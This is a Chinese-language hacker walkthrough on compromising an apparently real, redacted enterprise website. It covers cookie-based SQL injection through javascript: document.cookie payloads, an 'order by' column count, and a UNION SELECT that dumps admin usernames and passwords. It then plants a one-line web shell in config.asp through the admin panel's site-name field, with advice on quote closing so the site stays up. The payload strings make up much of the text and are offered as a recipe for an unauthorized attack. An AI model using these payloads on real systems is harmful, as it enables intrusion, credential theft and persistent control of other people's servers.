COOKIES注入拿站

 

 

 

这个是旁注时候的另一个站，当我在网址后加'的时候，看到如图所示界面，就想到存在COOKIES注入了。

 

 

　　因为以前曾经用这个拿过类似的站。通过浏览器地址栏注入COOKIES注入语句(这里的原链接是http://www.***.com/shownews.asp?id=101):

　　javascript:alert(document.cookie="id="+escape("101 and 1=1"))

 

 

 

 

重新访问shownews.asp时候返回正常，

　　接着输入：javascript:alert(document.cookie="id="+escape("101 and 1=2"))，访问shownews.asp返回错误如图。

 

　　这就验证了我一开始的想法。由于COOKIES注入是很慢的(我没找到好的COOKIES注入工具)，除非你知道表明和列明用UNION查询来得到后台帐户和密码。通过在网址后面加上admin，看到后台的时候，眼睛一亮，企业网站管理系统，和我上次拿的站差不多----企业网站管理系统。

 

 

 

 

　　根据上次的经验，地址栏输入注入语句

　　javascript:alert(document.cookie="id="+escape("101 and 1=2 union select 1,username,password,4,5,6,7,8,9,10 from admin"))

　　然后反问：http://www.***.com/shownews.asp。数据库出错!奇怪了，难道是字段名错了?输入

　　javascript:alert(document.cookie="id="+escape("101 and 1=2 union select 1,2,3,4,5,6,7,8,9,10 from admin"))还是出错，看来应该不是字段名错了，而是字段数目错了。提交判断字段数语句(使用order by语句的时候使用二分法可以迅速判断字段数)：

　　javascript:alert(document.cookie="id="+escape("101 order by 12"))，然后反问shownews.asp，刷新，返回错误，再提交

　　javascript:alert(document.cookie="id="+escape("101 order by 11"))正确，确定了news存在11个字段(我下了几套系统news都10个字段，怕是管理员修改了字段数了。)管他呢，接着提交javascript:alert(document.cookie="id="+escape("101 and 1=2 union select 1,username,password,4,5,6,7,8,9,10,11 from admin"))。访问http://www.***.com/shownews.asp，刷新，顺利得到了用户名和密码。

 

 

　　跑到CMD5网站上一查，付费记录。汗!没办法，其实进入后台后通过修改网站配置很容易得到webshell，因为他的网站配置文件是config.asp。为了使此文完整，在本地搭建的IIS服务器上演示(我验证过该网站存在/inc/conig.asp这页面)。进入后台后选择网站配置，在网站名称这里加入一句话木马: "%>

 

 

　　然后点击提交，这样我们的一句话马就写如了config.asp文件中，通过一句话连接成功得到webshell。

　　这里我要说明有2点，

　　1.是不能在配置信息和版权信息里面输入一句话，因为不能够闭合引号。这样会使别人的网站不能用(很多网页都include 了这个config文件，因此它出错导致网站几乎瘫痪)，所以我们选择可以输入引号的地方插入一句话木马。

　　2.是闭合的问题，config.asp源代码里面的是

　　Const EnSiteName="Enterprise Site Manage System" '网站名称

　　因此我们要输入"%>和<%'来闭合前后的引号。